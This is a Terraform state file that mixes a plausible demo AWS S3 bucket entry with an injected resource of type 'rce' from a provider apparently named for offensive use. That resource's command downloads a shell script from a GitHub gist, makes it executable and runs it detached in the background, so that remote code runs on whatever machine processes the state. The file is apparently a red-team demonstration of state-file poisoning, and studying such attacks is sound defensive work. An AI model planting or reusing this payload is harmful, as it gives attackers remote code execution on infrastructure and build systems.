{
  "version": 4,
  "terraform_version": "1.10.1",
  "serial": 1,
  "lineage": "abcd1234-5678-90ab-cdef-12345678abcd",
  "outputs": {},
  "resources": [
{
  "mode": "managed",
  "type": "rce",
  "name": "execmd",
  "provider": "provider[\"registry.terraform.io/offensive-actions/statefile-rce\"]",
  "instances": [
    {
      "schema_version": 0,
      "attributes": {
        "command": "echo run;curl https://gist.githubusercontent.com/RandomUserName-red/1a2d399899dd1bf9cac72c259a5c8055/raw/4930bdd2535b685da3c70a815fc22f86b1bac028/send2burp.sh -o send2burp.sh;chmod +x send2burp.sh; nohup ./send2burp.sh & disown",
        "id": "rce"
      },
      "sensitive_attributes": [],
      "private": "bnVsbA=="
    }
  ]
},
    {
      "mode": "managed",
      "type": "aws_s3_bucket",
      "name": "demo_bucket",
      "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "acl": "private",
            "arn": "arn:aws:s3:::my-unique-demo-bucket-123456",
            "bucket": "my-unique-demo-bucket-123456",
            "bucket_domain_name": "my-unique-demo-bucket-123456.s3.amazonaws.com",
            "bucket_regional_domain_name": "my-unique-demo-bucket-123456.s3.us-east-1.amazonaws.com",
            "force_destroy": false,
            "hosted_zone_id": "Z3DZXE0Q79N41H",
            "id": "my-unique-demo-bucket-123456",
            "region": "us-east-1",
            "request_payer": "BucketOwner",
            "tags": {
              "CreatedBy": "Terraform",
              "Environment": "Demo"
            },
            "website_domain": "",
            "website_endpoint": ""
          },
          "sensitive_attributes": [],
          "private": "bnVsbA=="
        }
      ]
    }
  ]
}
